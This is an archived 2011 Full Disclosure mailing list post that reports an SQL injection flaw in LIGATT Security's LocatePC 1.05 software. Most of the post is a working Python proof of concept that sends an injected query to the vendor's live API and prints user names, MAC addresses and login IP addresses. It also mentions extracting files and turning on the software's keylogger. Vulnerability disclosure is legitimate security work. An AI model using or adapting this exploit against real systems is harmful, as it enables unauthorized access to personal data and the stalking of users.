Full Disclosure mailing list archives

By Date By Thread trivial SQL injection in LIGATT Security's LocatePC software From: auto79576760 () hushmail com

Date: Wed, 09 Feb 2011 04:41:30 -0700

trivial SQL injection in LIGATT Security's LocatePC software -------------------------------------------------------------------- ---------- I'm going to skip all the drama and get straight to it. The software is crap. Affected Software: LocatePC 1.05 Consequences: Arbitrary SELECT queries against the LocatePC and "mysql" database. The LocatePC database contains enough information to stalk all users of the software. It may be possible to instruct the software to upload arbitrary files from each user's computer to the LocatePC database, and then to later extract those files from the database. Activating the software's keylogging functionality is both possible and hilarious. Proof of Concept: #!/usr/bin/python import httplib import urllib import xml.etree.ElementTree h = httplib.HTTPSConnection('www.ligattsecurity.com') p = '''<Request funcname="uName,mac_address,last_login_ip,program_login from user where LENGTH(last_login_ip) > 0;--"></Request>''' h.request("POST","/locatePC/api/",p,{"ContentType":"application/x- www-form-urlencoded"}) r = h.getresponse() data = urllib.unquote_plus(r.read()) for i in xml.etree.ElementTree.fromstring(data).iter(): if i.tag == "Row": print "" elif i.tag == "Cell" and i.text != None: print i.text Solution: DON'T USE LOCATEPC!!! References: - http://www.ligattsecurity.com/solutions/locate-pc _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ By Date By Thread Current thread: trivial SQL injection in LIGATT Security's LocatePC software auto79576760 (Feb 09)